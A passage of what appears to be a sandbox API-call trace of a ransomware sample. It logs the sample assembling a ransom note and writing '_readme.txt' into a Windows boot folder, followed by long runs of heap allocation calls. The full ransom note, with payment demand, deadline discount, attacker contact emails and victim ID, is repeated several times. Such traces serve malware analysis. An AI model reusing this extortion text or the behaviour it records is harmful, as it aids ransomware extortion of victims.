lpString1=0x9c82710, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s" [0056.225] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s", lpString2="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9" [0056.225] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5e2e0 [0056.225] CreateFileW (lpFileName="C:\\Boot\\it-IT\\_readme.txt" (normalized: "c:\\boot\\it-it\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0056.225] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8c0) returned 0x3268798 [0056.225] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x85d) returned 0x32acff0 [0056.225] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", cchWideChar=-1, lpMultiByteStr=0x32acff0, cbMultiByte=2141, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", lpUsedDefaultChar=0x0) returned 1118 [0056.225] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x326aa18 [0056.225] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32acff0 | out: hHeap=0x660000) returned 1 [0056.226] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.226] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9") returned 1117 [0056.226] WriteFile (in: hFile=0x5c8, lpBuffer=0x326aa18*, nNumberOfBytesToWrite=0x45d, lpNumberOfBytesWritten=0x9f4fb64, lpOverlapped=0x0 | out: lpBuffer=0x326aa18*, lpNumberOfBytesWritten=0x9f4fb64*=0x45d, lpOverlapped=0x0) returned 1 [0056.226] CloseHandle (hObject=0x5c8) returned 1 [0056.227] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326aa18 | out: hHeap=0x660000) returned 1 [0056.227] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5e2e0 | out: hHeap=0x660000) returned 1 [0056.227] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c82710 | out: hHeap=0x660000) returned 1 [0056.227] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.227] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.227] FindFirstFileW (in: lpFileName="C:\\Boot\\it-IT\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1eb6bcb0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eb6bcb0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0056.227] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.227] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1eb6bcb0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eb6bcb0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.227] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e80ea3, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0056.227] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1eb6bcb0, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1eb6bcb0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eb6bcb0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0056.227] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1eb6bcb0, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1eb6bcb0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eb6bcb0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0056.227] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0056.227] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.227] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eef0 | out: hHeap=0x660000) returned 1 [0056.227] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eef0 [0056.227] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0056.227] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.227] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.227] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.227] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.227] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.227] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.228] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.228] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.228] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.228] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.228] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.228] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.228] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.228] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.228] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.228] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.228] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.228] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.228] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.228] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.228] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.228] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.228] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.228] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.228] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.228] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.228] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x322cda8 [0056.228] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.228] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.228] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.228] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.228] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.228] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.228] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.228] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.229] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.229] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.229] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.229] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.229] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.229] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.229] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.229] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.229] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.229] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.229] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.229] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.229] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.229] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.229] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.229] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.229] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.229] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.229] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.229] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.229] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.229] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.229] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.229] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.229] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.229] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.229] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.229] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.229] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.229] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.229] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.229] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.230] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.230] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.230] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.230] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.230] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.230] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.230] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.230] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.230] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.230] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.230] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.230] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.230] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.230] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.230] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.230] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.230] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.230] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.230] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.230] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.230] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.230] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.230] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.230] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.230] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.230] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.230] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.230] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.230] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.230] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.230] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.230] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.231] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.231] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.231] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.231] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x322cda8 [0056.231] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.231] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.231] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.231] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.231] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.231] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.231] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.231] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.231] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.231] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.231] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.231] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.231] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.231] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.231] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.231] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.231] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.231] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.231] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.231] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.231] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) 